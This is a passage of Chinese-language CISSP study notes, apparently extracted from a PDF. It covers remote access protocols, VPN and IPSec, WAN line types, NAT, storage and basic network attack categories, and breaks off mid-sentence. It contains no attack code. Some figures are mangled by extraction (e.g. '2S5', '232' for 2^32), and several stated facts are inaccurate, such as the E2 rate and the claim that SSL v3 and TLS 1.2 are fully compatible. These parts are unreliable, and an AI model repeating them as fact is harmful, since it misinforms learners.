需要静态的 IP 地址,不提供差错检测或纠正功能,并且不支持压缩。 3.集中化的远程身份验证服务 集中化的远程身份验证服务(例如 RADIUS 和 TACACS+) 就提供了这种额外的保护层。具体 看第五域 B.3 章节吧。 4.远程访问服务 这里描述的服务许多用于 UNIX 操作系统。 ①Remote Shell (RSH) 从概念上讲,因为它们是建立在相互信任的基础上,因此可以滥用于被获得水平访问权限 和垂直提升权限的攻击。它们的认证和传输能力在设计时没有考虑安全性,因此,它们必须使 用封装(如,X11)或通过 SSH 代替 Telnet 和 Rlogin,来获得安全性。 ②Telnet 是一个基于命令行的协议,其设计目的是给通过命令行访问到另一个主机。虽然 WINDOWS 实现了这个协议,但 telnet 的最初是用在 UNIX 服务器世界中,事实上,一个 telnet 服务器 是任何 UNIX 服务器标准配置。它存在的问题: *极不安全,事实上,它使用在不受信任的环境中,会造成严重的安全隐患。 —131— *提供有限的用户名/密码认证。 *不提供加密。 一旦攻击者获得了正常用户的凭据,他很容易完成权限升级,他可以在机器上传输数据和 执行命令。作为运行在系统特权上的 Telnet 服务器,它本身就是一个有吸引力的攻击目标; 攻击正使用 Telnet 服务器的漏洞可以提升系统权限。因此,建议安全从业人员在互联网和互 联网连接的主机上停止使用 Telnet。事实上,标准的 Internet 服务器安全加固过程中,任何 服务器都应该禁用的 Telnet 服务,在 UNIX 系统通常运行 telnet 进程下,并应利用 ssh v2 远 程管理和管理所需的范围。 ③远程登录(rlogin),远程 shell(RSH),远程复制(RCP) rlogin 是一种使用 rlogin 授予远程访问机器的协议,通常是一个 UNIX 服务器。 同样,RSH 被赋权直接远程命令执行,RCP 拷贝数据或远程机器。如果一个 rlogin daemon (rlogind)进程,在一台主机上运行远程访问,可以通过两种方式获得: *通过中央配置文件使用; *通过用户配置。 后者,用户可以授权访问,而不是由系统管理员允许的。同样的机制适用于 RSH 和 RCP, 虽然他们都是依靠不同的守护进程(rshd)。其认证是基于主机/IP 地址,虽然基于用户 ID 的 rlogin 授予访问权限,但它不做验证:即,如果请求来自受信任的主机,则 ID 远程客户端所 声明的权限,即被授予给该 ID,rlogin 协议传输数据没有加密,因此受窃听和截取。 更安全的 SSH v2,可以替代 rlogin,rsh 和 rcp。 ④SSH 相当于 SSL+Telenet SSH 隧道的保护通信的完整性,防止会话劫持,中间人攻击。有两个不兼容的版本,SSH-1 和 SSH-2。SSH-2 具有改进的完整性检查(SSH-l 容易由于弱 CRC-32 完整性检查插入攻击),支 持本地扩展和数字证书等类型,如,开放 PGP 的。SSH 的最初设计是为 UNIX,但现在的操作系 统都支持 SSH,包括 Windows, Macintosh 的实现,和 OpenVMS。 5.永久虚拟电路(PVC)和交换虚拟电路(SVC) 虚电路为终端系统连接提供高带宽、多用户电缆或光纤的一个专用的物理电路,其表现为 一个专有电路。有两种类型的虚电路,基于当电路中的路径建立。 *在永久虚电路 PVC 中,当电路被购买后,运营商配置电路的路线。除非承运人改变路线 调整网络,或响应一个中断等,否则路线不会被改变。 *另一方面,一个交换虚电路 SVC 用于动态配置,更像是一个拨号连接。 5.虚拟私有网络(VPN)Virtual Private Network VPN 是上一章的内容,和 IPsec、SSL 一起放到本章来讲。这个是必考的。 虚拟专用网(VPN)是一个通信隧道,它可以在不可信的中间网络上提供身份验证和数据通 信的点对点传输。大多数 VPN 使用加密技术来保护封装的通信数据。VPN 在不安全的或不可信 的中间网络上提供了机密性和完整性,但是并不提供和保证可用性。 ①隧道技术 —132— 你能真正理解 VPN 之前,你必须先理解隧道技术。隧道技术是网络的通信过程,它通过将 协议包封装到其他协议包中来保护协议包的内容。隧道技术可以用在很多场合(如绕过防火墙、 网关、代理或其他通信控制设备时)。通过将受限制的内容封装入己授权传输的数据包,就可 以实现旁路。每当使用安全的 SSL 或 TLS 访问 Web 站点时,就会使用到隧道技术,此时明文 Web 通信通过隧道技术被装入 SSL 或 TLS 会话。此外,如果使用互联网电话或 VoIP 系统,那 么语音通信会通过隧道技术被装入某种 VoIP 协议。 隧道技术也存在缺点:隧道会消耗额外的网络带宽。此外,隧道技术是一种点对点的通信 机制,并且设计时没有考虑对广播通信的处理。隧道技术也使得在某些情况下监控流量的内容 变得很难。 ②VPN 协议 有四种常用的 VPN 协议:PPTP, L2F, L2TP 和 IPSec。(SSL/TLS 也可以被用来作为一个 VPN 协议,而不只是作为一个工作在 TCP 之上的会话加密。不过 CISSP 并不把 SSL/TLS 作为 VPN 来考。) PPTP+L2F=>L2TP;L2TP+IPSec=VPN。 PPTP, L2F, L2TP 工作在第二层,IPSec 在第三层; PPTP, L2F,IPSec 仅用于 IP 网络,L2TP 可用于任何局域网协议(LAN)。 VPN 总结如下表,协议详述在后面: 1.点对点隧道协议 Point-to-Point Tunneling Protocol 点对点隧道协议(PPTP)是从拨号协议点对点协议(PPP)开发出来的一种封装协议。它工作 在 OSI 模型的数据链路层(第二层),依靠通用路由封装(GRE)来建立隧道,并且被用在 IP 网络 中,PPTP 不支持 TACACS+和 RADIUS。PPTP 在两个系统之间创建了一个点对点隧道,并且封装 了 ppp 包。使用与 PPP 相同的身份验证协议,这些身份验证协议包括: ①Microsoft 挑战握手身份验证协议(MS-CHAP) ②挑战握手身份验证协议(CHAP) ③密码身份验证协议(PAP) ④扩展身份验证协议(EAP) ⑤Shiva 密码身份验证协议(SPAP) CISSP 考试的重点是 PPTP 的 RFC2637 版本,而不是微软版本的实现,那个版本进行了专 有修改并使用微软点对点加密(MPPE)来支持数据加密。PPTP 使用的最初隧道协商过程并没 有加密。因此,包含发送者和接收者 IP 地址(可以包括用户名和散列密码)的会话建立通信包 可能被第三方截获。PPTP 被用在 VPN 上,但是它常常被第二层隧道协议(L2TP)替代。L2TP 可 —133— 以使用 IPSec 为 VPN 提供通信加密。 2.二层转发协议 L2F 和二层隧道协议 L2TP/Layer 2 Forwarding Protocol and Layer 2 Tunneling Protocol Cisco 公司开发了自己的 VPN 协议:第二层转发协议(L2F),这是一种相互的身份验证隧 道机制。然而,L2F 并不提供加密。L2F 没有得到广泛部署,并且很快被 L2TP 所取代。正如它 们的名字所提示的,它们都工作在第二层。它们都可以封装任何局域网协议。 二层隧道协议(L2TP)源自于 PPTP 和 L2F 的组合。L2TP 会在通信的端点之间建立了一个点 对点的隧道。L2TP 缺乏内置的加密方案,而是通常依赖 IPSec 作为它的安全机制。L2TP 还支 持 TACACS+和 RADIUS。IPSec 通常为 L2TP 用做一种安全机制。 3. IP 安全协议/ IPSec/IP Security Protocol(重点) 目前最常用的 VPN 协议是 IPSec。IPSec 既是一个独立的 VPN 协议,又是用于 L2TP 的安 全机制,并且只能用于 IP 通信。IPSec 提供了安全的身份验证以及加密的数据传输。IPSec 会改变数据包的报头中的 IP 地址,这可以被认为是一种攻击,因此,NAT 与 IPSec 不能同时 工作。为了解决这两个协议的不兼容问题,可以使用 NAT 穿越(又名 IPSec NAT-T)技术,封装 UDP 端口 4500(参见 RFC 3948)。第三域 I.6 章节也提了下 IPSec。 IPSec 具有下列 3 个主要的组件或功能: ①身份验证头(AH)。AH 提供身份验证、完整性以及不可否认性。在每个数据包(头+数据) 传输之前,一个使用共享秘钥加密数据包内容的哈希值(除了数据包路由时需要使用的信息, 这个地址信息有可能改变)将被插入到 AH 包头中。终端系统之间协商使用哈希算法和共享密钥 后,它们建立安全关联 SA。为帮助防止重放攻击(一个合法会话,被重新转发以获得未经授权 的访问权限),每个数据包在发送时,其 SA 都有一个序列号,并将其存储在 AH 中。在传输模 式,AH 之间插入数据包的 IP 和 TCP 报头。AH 有助于确保真实性和完整性,不保证其机密性。 加密是通过封装安全载荷(ESP)来实现的。 ②封装安全有效载荷(ESP)。ESP 提供了加密,从而能够保护传输数据的机密性,也可以 执行有限的身份验证操作。ESP 在网络层(第三层)上工作,包含四个部分: *ESP 头部/报头:包含安全关联(SA)使用,数据包的序列号。和 AH 一样,ESP 给每一个数 据包编一个序列号,以阻止重放攻击。 *ESP 有效负载:负载包含数据包的加密部分。ESP 通常使用对称加密算法。 *ESP 尾部:包括填充(填充字节),满足要求的加密算法的分组字串长度。 *ESP 认证部分/身份认证:如果要使用身份认证,此 ESP 数据包字段应包含完整性检查值 (Hash)。就像也相当于 AH 包头,终端系统相互协商身份认证算法来建立安全关联 SA。 ESP 有两种模式: 传输模式:只加密 IP 数据包,数据包的头部并没有进行加密。主要用于客户端和服务器 等端到端的保护。 隧道模式:整个 IP 数据包都加密,并且新的数据包头被添加至 IP 数据包,从而能够控制 通过隧道进行的传输。通常用于网络之间,如防火墙的 VPN。 ③安全关联/安全联盟(SA) SA 是终端系统间通信的沟通机制。所有的 SA 只能单向传输,双工通信必须要 2 个 SA。 —134— ④因特网密钥交换协议 IKE protocol 因特网密钥交换协议(IKE)允许两个设备“交换”对称密钥,用于在 AH 和 ESP 加密信息。 有两种方式来“交换”密钥: 1 使用 Diffie-Hellman (DH) 式的协商 2.使用公钥证书(PKI)。IKE 会考到,但书上没写详细,算了。 4.SSL/TLS VPNs SSL(安全套接字层)v3 和 TLS(传输层安全)v1.2 基本上是完全兼容的,最初的 SSL 加密工 具是由 Netscape 开发,TLS 1.2 是由开放标准的 IETF 基于 SSL3.0 开发的。SSL 和 TSL 使用公 钥证书进行彼此身份验证,它们相互认证。 SSL VPN 是远程访问的另一种方法。不像建立一个网络层的 IPSec VPN,SSL VPN 利用 SSL/ TLS 创建隧道回到家庭办公室。远程用户使用 Web 浏览器来访问该组织的网络应用。即使用户 使用 Web 浏览器,SSL VPN 不仅限于使用 HTTP。指插件的帮助下,如 Java,用户可以访问后 端数据库,和其它非 Web 应用程序。SSL VPN 与 IPSec VPN 相比有几个优势。它们比 IPSec 更 容易部署在客户端工作站,因为它们只需要一个 Web 浏览器,和几乎所有的网络允许传出 HTTP。 SSL VPN 可以通过代理服务器的操作。此外,应用程序可以根据安全标准限制用户的访问权限, 如外网网络用户,SSL 有助于建立企业的外联网络。 5.高保证互联网协议加密(HAIPE) 基于 IPSec 的 HAIPE 具有额外的限制和增强:例如,使用高保证硬件加密所有的通讯设 备上对组播数据加密的能力,但是所有设备上的相同的密钥需要手工加载。HAIPE 是 IPSec 的 一个扩展,可用于高度安全的通信,如,使用在军事应用。 高保障 IP 加密机 HAIPE:不通过网络来协商密钥,全部预置在硬件设备里,这样更安全。 C.4 数据通信(例如:VLAN,TLS/SSL) 1.网络拓扑 Network Topologies 环型 ring、总线型 bus、星型 star 和网状型 mesh。都很简单,不讲了。 2.单播 unicast、组播 multicast、广播 broadcast 还有任播 anycast 一对一的主机传输称为单播传输。 广播有特定的使用用途。己知一个路由器的 IP 地址,但不清楚设备的 MAC 地址时,路由 器将广播地址解析协议(ARP)的请求,以解析设备的 MAC 地址。 多播就是组播,目的是要提供一个流,只传送感兴趣的主机。无线电广播是一种多播典型 类型。选择一个特定的电台节目,你需要调整收音机的特定广播电台。同样,获得所需的多播 服务,你需要加入相应的组播组。组播代理用于在网络及管理组播组中路由组播流量。每个支 持组播的网络和子网络必须至少有一个组播代理。主机使用 Internet 组管理协议(IGMP)通告 本地的组播代理,它想加入一个特定的组播组。组播代理也路由组播到本地主机的组播组成员 和中继组播到邻近的代理。当一个主机要离开一个多播组,它发送一个 IGMP 消息到本地组播 代理。组播不使用可靠会话。因此,组播是尽力而为的传送,不保证数据报接收。 任播允许源节点向一组目标节点中的任一节点发送数据报;在 DNS 防护中得到普遍引用。 3.交换网络 —135— 两个系统(单独的计算机或 LAN)通过多个中间网络连接肘,从一个系统向另一个系统传输 数据包的任务是非常复杂的过程。为了简化这个任务,交换技术应运而生。 ①电路交换网络(模拟) 主要用于电话网,PSTN 什么的。在终端系统之间,电路交换网络建立专用电路。这些电 路由专用交换机连接。直到电路完全建立,终端系统开始通讯。终端系统使用专用电路及带宽。 运营商计费是基于打开连接的持续时间电路的成本,这使得这种类型的网络终端系统间是稳定 的经济通信。实例,电路交换网络是普通旧式电话服务(POTS),综合业务数字网(ISDN),和点 对点协议(PPP)。 ②分组交换网络(数字) 端系统之间的分组交换网络不使用专用连接。相反,数据分割分为数据包在一个共享的网 络传输。每个数据包中包含的元信息,它可以独立地在网络中路由。网络设备将尝试为每个数 据包目的地寻找最佳路径,数据包可以采取不同的路径和不同的顺利到达网络对端。目标端点 有责任确保接收到的数据包,以正确的顺序在堆栈中重组。 4.虚拟局域网 Virtual LAN 虚拟局域网(VLAN)被用于硬件上以实施网络分割,这是交换机的最基础功能。搞网络的 都配过 VLAN,没什么好说的。 VLAN 可以控制流量,管理子网,对安全而言有以下功能和好处: ①控制和限制广播流量。阻断在子网和 VLAN 中的广播。 ②在子网之间隔离通信和流量。 ③减少网络被监听的脆弱点。 ④抑制对抗广播风暴(泛洪攻击)。 ⑤端口隔离或私有端口。 5.广域网 WAN 搞通信的,做主干网维护的就很清楚。一般分为专线(电信信道)和非专线(拨号)。 专线有欧洲标准和美国标准,都是基于电信光纤传送网的传输系统。 ①美国电信专线 0 级数字信号 DS-0,T1,64K 到 1.544M; 1 级数字信号 DS-1,T1,1.544M,24 路电话; 2 级数字信号 DS-2,T2:4×T1,6.312M; 3 级数字信号 DS-3,T3:7×T2,28 个 T1,44.736M; 4 级数字信号 DS-4,T4:6×T3,274.176M。 ②欧洲电信专线(中国用的多) 欧洲数字传输格式 1,E1:2.048M; 欧洲数字传输格式 2,E2:8.848M; E3:34.304M; E4:139.264M。 Optical Carrier (OC) Bandwidth: OC-1:51.84M; OC-3:155.52M OC-9:466.56M; OC-12:622.08M —136— OC-18:933.12M; OC-24:1244.16M OC-36:1866.24M; OC-48:2488.32M OC-192:9953.28M。 ③数字用户线路(DSL) DSL 技术利用升级电话网使用户的通信速度达到 144Kbps 至 6Mbps(或更高)的水平。DSL 存在多种格式,例如 ADSL、xDSL、CDSL、HDSL、SDSL、RASDSL、IDSL 与 VDSL,每种格式的区 别在于所提供的下行带宽和上行带宽有所变化,最大传输距离大有几公里。针对考试而言,只 需要理解 DSL 的总体概念。 *不对称数字用户线(ADSL):下行传输速率比上行的大得多,一般是 256 到 512 Kbps 的下 游和上游 64 kbps。 *速率自适应 DSL(RADSL):上行传输速率自动调整基于线路质量。 *对称数字用户线(SDSL):使用相同的速率上行和下行传输。 *高速 DSL (VDSL):支持的传输速率比其他 DSL 技术更高,如 13Mbps 下行和 2Mps 上行。 *宽带 DSL(HDSL) High-Data-Rate Digital Subscriber Line:上下行相,都是 1.544Mbps。 ④综合业务数字网(ISDN) ISDN 是一种完全数字化的电话网,能够同时支持语音通信和高速数据通信。ISDN 服务格 式存在两种标准等级或格式: 基本速率接口(BRI)。为客户提供的连接具有两个 B 信道和一个 D 信道。B 信道支持 64Kbps 的吞吐量,被用于数据传输。D 信道则用于电话,带宽为 16Kbps。尽管没有设计 D 信道支持 数据传输,BRI 仍然号称为客户提供的总吞吐量为 144Kbps。(运营商坑爹) 主速率接口(PRI)。为客户提供的连接具有 2 至 23 个 64Kbps 的 B 信道和一个 64Kbps 的 D 信道。因此,我们部署的 PRI 最小为 192Kbps,最大为 l.544Mbps。不过需要记住的是,因为 包含不能用于实际数据传输的 D 信道,所以这些数字指的是带宽而不是数据吞吐量。 还有卫星什么的,不考。 ⑤其它各种广域网连接技术(都是分组交换) WAN 为 LAN 提供了入网的所有接口。边界连接设备称为信道服务单元/数据服务单元 (CSU/DSU)。这些设备将 LAN 信号转换为网络运营商网络所使用的格式,反之亦然。CSU/DSU 包含数据终端设备/数据电路终端设备(DTE/DCE),这些设备为 LAN 的路由器(DTE)与 WAN 运营 商网络的交换机(DCE)提供了实际的连接点。CSU/DSU 起到了转换器、存储转发设备与链路调 节器的作用。CSU/DSU 存在多种类型,如 X.25、帧中继(Frame Relay)、SMDS 与 ATM。 channel serviceunit/data service unit (CSU/DSU), data terminal equipment/data ircuit-terminating equipment (DTE/DCE), 在单位负责十几年网络的人应该经历了主干网技术的演变。 X.25 连接 X.25 是一种出现较早的分组交换技术,并且在欧洲范围内被广泛应用。这种技术使用永 久虚电路在两个系统或网络之间建立特定的点对点连接。X.25 是帧中继的前身,二者的运作 方式几乎一模一样。不过,与帧中继或 ATM 相比,X.25 自身的性能较低、吞吐速率较慢,因 此在逐步走向衰落。 —137— 帧中继连接 Frame Relay 与 X.25 一样,帧中继也是一种使用 PVCs(永久虚电路)的分组交换技术,工作在第二层。 然而与 X.25 不一样的是,帧中继连接支持多条 PVCs。帧中继是一种使用分组交换技术在通信 终端之间建立虚电路的第二层连接机制。专线或租用线的成本主要取决于通信终端之间的距 离,而帧中继的成本主要取决于传输的数据量。帧中继网络是一种共享介质,提供点对点通信 的虚电路就被创建在这种介质中。所有虚电路都是独立的,并且彼此不可视。 承诺信息速率(CIR) committed information rate 是一个与帧中继相关的重要概念。CIR 是服务提供商向其客户保证的最小带宽,通常远小于服务提供商网络的实际最大带宽。 帧中继要求在每个连接点上都使用 DTE/DCE。客户拥有 DTE (类似于路由器或交接机,并 且为客户的网络提供对帧中继网络的访问)。帧中继服务提供商拥有 DCE,从而完成数据在帧 中继网络中的实际传输以及为客户建立和维护虚电路。T 是 terminal,C 是 central,很好理 解吧。 SMDS 交换式多兆位数据服务(SMDS) Switched Multimegabit Data Service 是一种无连接的分 组交换技术。通常,SMDS 用于连接多个 LAN,从而组成一个城域网(MAN)或 WAN。如果需要链 接极少通信的远程 LAN,那么 SMDS 往往是首选的连接机制。SMDS 支持高速的突发通信量,并 且支持按需分配带宽。SMDS 机制将数据分片为若干小的传输信元。考虑到使用了相似的技术, 所以可以将 SMDS 视为 ATM 的前身。 ATM 异步传输模式(ATM) Asynchronous transfer mode 是一种信元交换 WAN 通信技术。这种 技术将通信分片为若干长度固定为 53 字节的信元。通过使用长度固定的信元,ATM 更有效率, 并且能够提供更高的吞吐量。ATM 既可以使用 PVC ,也可以使用 SVC。ATM 提供商保证其租用 服务的最小带宽与指定的质量等级。ATM 是一种面向连接的分组交换技术。 ⑥专门的广域网协议 某些 WAN 连接技术需要使用其他专门的协议来支持各种各样特殊的系统或设备。主干路 由器上经常会看到。如: 同步数据链路控制(SDLC) Synchronous Data Link Control 同步数据链路控制被使用在专门租用线路的永久物理连接上,从而为大型机(如 IBM 系统 网络体系结构[SNA]系统)提供连通性。运作在 OSI 模型第二层(即数据链路层)的 SDLC 使用了 轮询技术,是一种面向比特的同步协议。 高级数据链路控制(HDLC) High-Level Data Link Control 高级数据链路控制是 SDLC 的改进形式.专门针对同步串行连接而设计。HDLC 支持全双工 通信,并且支持点对点连接与多点连接。与 SDLC 一样,HDLC 使用了轮询技术,同样运作在 OSI 模型的第二层(即数据链路层)。此外,HDLC 还提供流控制,并且包括差错检测与校正。 高速串行接口(HSSI) High Speed Serial Interface 高速串行接口是一个 DTE/DCE 接口标准,它定义了复用器和路由器如何连接高速网络运营 商服务(如 ATM 或帧中继)。复用器是一种能够实现在单条线路或虚电路上传输多种通信或信 号的设备。HSSI 定义了接口或连接点的电气与物理特征,因此该协议运作在 OSI 模型的第一 —138— 层(即物理层)。 ⑦拨号封装协议 Dial-Up Encapsulation Protocols 点对点协议(PPP)是一种封装协议,它被设计用于支持在拨号或点对点链接上传输 IP 通信 数据。PPP 允许通过 WAN 设备的多供应商互用性来支持串行连接。所有拨号连接与大多数点对 点连接性质上都属于串行连接(与并行连接相对)。PPP 包含众多通信服务,这些通信服务包括 IP 地址的分配与管理、同步通信的管理、标准化封装、复用、链接配置、链接质量测试、差 错检测以及特性或选项协商(例如对压缩的协商)。 PPP 最初被设计用于支持针对身份验证的 CHAP 和 PAP 协议。不过,最新版本的 PPP 也 支持MS-CHAP、EAP 以及SPAP 协议。此外,PPP还可以用于支持网际包交换协议(IPX) 和DECnet 协议。PPP 在 RFC1661 文档中记录为互联网标准。PPP 替代了串行线路互联网协议(SLIP)。 SLIP 只支持半双工通信,没有提供身份验证,不存在差错检测能力,并且要求人工建立与关 闭链路。 6.安全边界 安全边界是任何两个具有不同安全要求或需求的区域、子网或环境之间的交线。安全边界 存在于高安全性区域和低安全性区域之间,例如某个 LAN 和互联网之间。识别你的网络上和 现实世界中的安全边界十分重要。一旦你确定了安全边界,那么你就需要部署某些控制和机制, 从而控制跨越这些安全边界的信息流。 7.简单网络管理协议(SNMP) SNMP 是设计用来管理网络基础设施。SNMP 包括管理服务器客户端,客户端安装在网络设 备,如路由器和交换机,也被称为代理人。SNMP 允许管理端“GET”的代理变量的值,以及“SET" 赋值变量。 最容易利用 SNMP 的漏洞是一个蛮力攻击,用来猜测容易的密码,这个密码被称为“SNMP 团体字符串”,常常用来管理远程设备。社区字符串是一个潜在的严重风险,但也是容易减轻 的风险。直到 V2 版本,SNMP 没有提供任何程度的身份认证和传输的安全性保护。身份认证只 包括一个叫做社区字符串的标识符,由管理端自己确认,并使用特定的密码对代理(这个字符 串被配置成代理)发送命令。在这种情况下,密码很容易被截获,从而导致命令被嗅和可能的 伪造。SNMP 版本 2 不支持任何形式的加密,使用明文形式的密码(社区字符串)。SNMP 版本 3 针对这一弱点,使用了加密的密码。 C.5 虚拟化网络(例如:SDN、虚拟 SAN、来宾操作系统、端口隔离) VMware 已经用的很多了,比较好理解。虚拟软件也没什么好说的。 1.虚拟桌面 virtual desktop 这个术语指的是至少三种不同类型的技术: ①远程访问工具。授予用户访问一个远程的计算机系统,允许远程查看和远程桌面的显示、 控制键盘、鼠标等。 ②扩展的虚拟应用。封装多个应用和某种跨操作系统的桌面形式,给用户提供了一个综合 平台而无需多台电脑。 ③扩展或扩展桌面。使用户可使用多个应用程序的布局,使用按键或鼠标动作之间的切换。 —139— 2.虚拟网络 Virtual Networking 虚拟化网络或网络虚拟化是将硬件和软件版网络组件组合成一个单一的集成实体。由此产 生的系统允许软件控制所有网络功能:包括管理,流量整形,地址分配等。虚拟化网络就是软 件定义网络 SDN,当然也包括虚拟 SAN 等。 软件定义网络 SDN 也是虚拟网络,在 A.5 章节里讲清楚了。 3.软件定义的存储和虚拟 SAN 虚拟 SAN (存储区域网络)也是一个网络技术,它将多个单独的存储设备组合成一个单一 的综合网络访问存储容器。一个虚拟 SAN 或软件定义的共享存储系统是一个在虚拟网络或 SDN 上虚拟的 SDN。 软件定义存储(SDS)的一个基本前提是管理程序(存储中的操作系统)是数据中心新的裸机 部署在一个软件定义的数据中心(SDDC),所有的服务都是建立在虚拟化层,它不仅明确分离出 数据平面和控制平面,但也允许存储功能延伸到生成时间。不是依靠严格的硬件构建满足所有 工作负载的需求,特性和政策可以通过虚拟机管理程序。管理程序和 SDS 一起通过提供 API 菜 单服务,来了解各种硬件设备的功能和使用正确的功能和性能的需要,在每一个虚拟机的基础 上。在 SDS,硬件是增强软件功能强大的机制,使所有的 X86 节点参与扩展、分布式集群,可 以用线性的方式扩展规模,而没有太多的整体限制。在这种规模的存储模型,每一个 x86 节点 包含直接连接硬盘和固态存储,可以通过所有节点和所有的工作负载来均衡影响。此外,规模 化不仅适用于存储容量,而且适用于存储控制逻辑,有助于在规模扩张时,避免性能瓶颈。 作为与 SDN 案例,SDS 寻求分开的物理存储硬件和存储逻辑.存储逻辑决定数据放置和什 么服务应用中的读写操作。这将导致存储层非常灵活,能够适应变化的应用需求。它还创建了 一个统一的、一致的数据结构,每个虚拟机保持充分的可见性。 存储服务要提供:动态分层、缓存、复制、服务质量 QOS、快照、去重、压缩、克隆。 基于 SDS 存储系统提供保护和数据可用性机制的几种类型: ①智能数据布局:数据保护开始于第二份数据写入物理磁盘并确认应用负载。在 SDS 的存 储系统,数据放置和保护是至关重要的,因为没有基于硬件的 RAID 数据保护工作机制。在 SDS , 数据布局可能发生若干次。 ②控制器:SDS,基于软件的控制器负责确保数据从磁盘读写的可用性,保证数据可以被 应用程序和虚拟机使用。软件控制器往往是冗余的,用于帮助环境保持高水平的可用性,即使 在发生故障的时候。 ③软件 RAID:通过 SDS,基于硬件的 RAID 系统不再使用,现在主要使用基于软件的 RAID, 符合概念的 SDS ,这些 RAID 构建必须被基于软件的控制器完全支持,并且,必须能够扩展以 满足企业级的容量和性能需求。 4.网络地址转换 NAT NAT 是一种将包头中的内部 IP 地址转换为公共 IP 地址从而在互联网上进行传输的机制。 NAT 只能被用在 IP 网络中,并且在 OSI 模型的网络层(第三层)上工作。 NAT 的功能和好处有: ①只租用少量的公网 IP 地址。 ②局域网使用专用 IP 地址(私网 IP 地址)。 —140— ③隐藏内部 IP 地址方案和网络拓扑结构。 ④通过限制连接提供了保护,只有来自于内部受保护网络的连接才被准许从互联网返回网 络,减少 DOS 攻击。 通常,安全专家提到的 NAT 实际上是 PAT。端口地址转换(PAT)将一个内部的 IP 地址映射 为一个外部 IP 地址和端口号的组合。因此,PAT 理论上在单个外部租用 IP 地址上可以支持 65536(232)个来自内部客户端的、同时发生的通信。如果使用 NAT,那么租用的公共 IP 地址数 必须与期望同时发生的通信数相同,不然内网还是出不去。 IPv4 的可用地址空间只有 40 亿个(232 ),早期设计者具有很好的前瞻性,他们为专用的 无限制的网络留出了一些地址空间。这些IP地址通常被称为专用/私网IP 地址,在RFC1918 中 进行了定义,如下所示: *10.0.0.0~10.255.2S5.2S5(整个 A 类范围) *172.16.0.0~172.31.255.255(16 个 B 类范围) *192.168.0.0~192.168.255.25S(255 个 C 类范围) 你可以使用的 NAT 有两种模式:静态和动态。 静态 NAT 将特定的内部客户端的 IP 地址被永久地映射到特定的外部公共 IP 地址时,就会使用静 态模式的 NAT,静态 NAT 也会允许外部实体与专用网络内部的系统进行通信。 动态 NAT 动态模式的 NAT 允许多个内部客户端使用较少的租用公共 IP 地址。因此,即使租用的公 共 IP 地址较少,较大的内部网络仍然能够访问互联网。在动态模式的 NAT 中,NAT 系统维护 了一个映射数据库,从而使来自互联网服务的所有响应信息正确地路由至最初的内部请求客户 端。NAT 常常与代理服务器或代理防火墙相结合,从而提供额外的互联网访问和内容缓存功。 因为 NAT 更改了数据包头,而 IPSec 依赖数据包头来阻止安全违规,所以 NAT 并不直接 与 IPSec 相容。不过,某些版本的 NAT 代理被设计为在 NAT 上支持 IPSec。 5.自动私有 IP 地址寻址 Automatic Private IP Addressing 一旦 DHCP 分配失败,自动私有 IP 地址寻址(APIPA),又叫做本地链路地址分配会为系统 指派 IP 地址。APIPA 基本上是一项 Windows 功能。APIPA 为每个失败的 DHCP 客户端指派从 169.254.0.1 到 169.254.255.254 范围内的一个 IP 地址(以及默认 B 类子网掩码 255.255.0.0)。这允许系统与同一广播域内其他配置 APIPA 的客户端进行通信,但是不能跨 越路由器与任何系统通信,也不能与正确分配了 IP 地址的任何系统通信。 不要混淆 APIPA 和 RFC1918 定义的私有 IP 地址范围。APIPA 通常不直接涉及安全。然而, 它仍然是一个需要重点理解的问题。如果你发现一个系统分配一个私有地址而不是有效的网络 地址,这表明是一个问题。它可以是 DHCP 服务器的电缆或电源故障,但也可能是对 DHCP 服务 器恶意的一个攻击征兆。你可能会被要求解释问题 IP 地址出自哪里。你应该能够判断一个地 址是一个公共地址、一个 RFC1918 私有地址、一个 APIPA 地址,或一个环回地址。 169.254 的 IP 经常会遇到的,笔记本连接一个 CMCC 或 CHINANET 的共用 WIFI 点的时候, 经常不成功就出现这个地址了。 6.网络存储 —141— ①独立磁盘冗余阵列(Redundant Array of Independent Disks, RAID) 为硬盘提供容错功能,并且能够改善系统性能。镜像(也称为 RAID 1)和双控过程中,每 一个写入数据的操作都在几个物理位置同时或几乎同时发生,提供一定程度的容灾难能力。镜 像和双控之间的区别在于:使用镜像时,写入数据的两个(或多个)物理位置需要依赖同一个控 制器,因而存储仍然会受到控制器本身的单点失败影响;双控则使用两个或几个控制器。 RAID 经常考 1、5、6、10,在第七域 K.1 章节详述。 ②直接访问存储设备(Direct Access Storage Device DASD)是磁性磁盘存储设备使用的 一个常用术语;历史上,它曾用在大型机和小型计算机环境内。RAID 就是一种 DASD。 ③大规模非活动磁盘阵列(Massive Array of Inactive Disks ), MAID 是一种最近才进 入中型存储设备(数百兆兆位)市场的产品。由于很少访问的驱动器的电源被断开,因此能源消 耗明显减少,磁盘驱动器的使用寿命也随之延长。较小的存储需求通常不适合于采用 MAID。 至于需要大量写操作的最高端的存储需求,磁带驱动器仍然是最经济的解决方案。 D.预防和减缓网络攻击 网络攻击的类型、方法、技术很多很杂,在第九域有汇总,要自己慢慢梳理。 1.DoS 和 DDoS/ denial-of-service 拒绝服务攻击是一种资源消耗型攻击,它以阻止受害系统的合法活动为主要目标。DoS 不 是一个单一的攻击,而是指一类攻击。一些攻击利用操作系统软件的缺陷,而其他的则把重点 放在安装的应用程序、服务或协议。一些攻击利用具体的协议,包括互联网协议 IP,传输控 制协议 TCP,lnternet 控制消息协议(ICMP)和用户数据报协议 UDP 等。 靠一台主机攻击显然力量不够,最好是 DDOS,通过僵尸网络来搞,还能隐藏自己。 怎么防 DOS 不说了,应该都想得到。考试中有使用 tarpit 来防御 DOS,类似于蜜罐,是 一个模拟的有漏洞的服务组件,当遭受一些非法扫描等攻击时,它会让攻击者的自动扫描的工 具软件出现响应失败或连接超时。 2.偷听/窃听 Eavesdropping 窃听需要搭线。由于使用的是被动攻击方式,因此检测偷听设备和软件通常较为困难。如 果偷听或窃听从而更改通信数据或在其中添加数据,则属于主动攻击类型。Sniffers、 NetWitness、T-Sight、Wireshark、Zed Attack Proxy (ZAP)等好多工具可以用。 保证在内部基础架构之外安全可靠地传输数据是极其重要的,就是要加密。 3.假冒/伪装 Impersonation/Masquerading 模仿或是伪装,是一种假装是某人或假装是某物并获得未经授权而访问系统的行为。这通 常意味着认证证书被窃取或者遭受篡改并满足(即成功地绕过)认证机制。这不同于欺骗,实体 提出了一个虚假的身份但没有任何证据(如错误地使用 IP 地址、MAC 地址、电子邮件地址、系 统名称、域名等)。模仿往往可以通过捕获网络服务会话设置中的用户名和密码加以实现。 对付假冒攻击的解决方案包括:使用一次性填充和令牌身份验证系统,使用 Kerberos , 